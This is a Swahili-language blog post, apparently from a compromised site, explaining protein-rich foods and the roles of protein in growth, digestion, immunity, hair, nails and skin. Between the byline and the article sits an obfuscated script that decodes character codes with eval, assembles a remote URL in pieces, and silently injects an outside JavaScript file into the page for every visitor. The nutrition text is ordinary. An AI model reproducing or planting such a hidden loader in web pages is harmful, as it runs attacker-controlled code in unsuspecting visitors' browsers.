Recent Comments

Ili kupat Protini ya Kutosha Andaa Mlo huu

By ventas malack Jan 12, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Moja ya kirutubisho muhimu sana kwa mwili wa binadamu ni Protini kwakuwa huimarisha miili yetu, huratibu ukuaji wa mwili na utengenezji wa nywele, kucha na kutengeneza tishu na seli zilizoharibiwa, hivyo zinatakiwa kutumika na mwili wa kiasi mahususi mana zikizidi sana zina madhara

Makala hii ya leo itatoa ufafanuzi madhubuti ju ya vyaul vyenye protini na matumizi yake mbalimbali katik mwii wa binadamu.
Vyakula vyenye Protini ni Vipi?
Protini hupatikana kwenye vyakula vingi ambapo hupatikana kwa gharama nafuu mahali popote.
Samaki wote, mazao yote jamii ya Maharage, Kunde, Nyama zote, Maziwa hasa fresh, Mayai hasa kienyeji, Karanga na pia Almondi.

Umuhimu wa Protini kwa Binadamu
A) Huratibu Uimarishwaji na Ukuaji wa mwili wa binadamu, hii ni kwasababu huzirekebisha na kuziboresha Tishu zilizoharibiwa mwilini hivyo kuzuia mwili kudhohofika na kuchochea ukuaji Mzuri.
B) Huratibu Shughuli za kibaiolojia za mwili ikiwemo umeng’ enywaji wa chakula, ambapo hii ni kutokana na protini kuzalisha enzymes muhimu katika mwili na kupelekea afya njema kwetu.
C) Hulinda mwili, ambapo hii ni kwasababu protini ni muhimu katika utengenezaji na uboreshaji wa kinga mwilini kwa mfano seli nyeupe za damu ambapo hii husaidia kuulinda mwili dhidi ya maradhi mbalimbali.

D) Huratibu kuundwa na kuimarishwa kwa baadhi ya sehemu za mwili ikiwemo kucha, nywele na ngozi mfano Keratin protini inayokuza nywele, kucha na kuimarisha ngozi
KUMBUKA: Protini ni muhimu, hivyo mzazi hakikisha mtoto wako anapata protini kwa kiwango stahiki kwani ndio wakati mwili unahitaji sana ili akue vyema na kwa afya njema kimwili na akili.
@ventas Malack

By ventas malack

Make the World Aware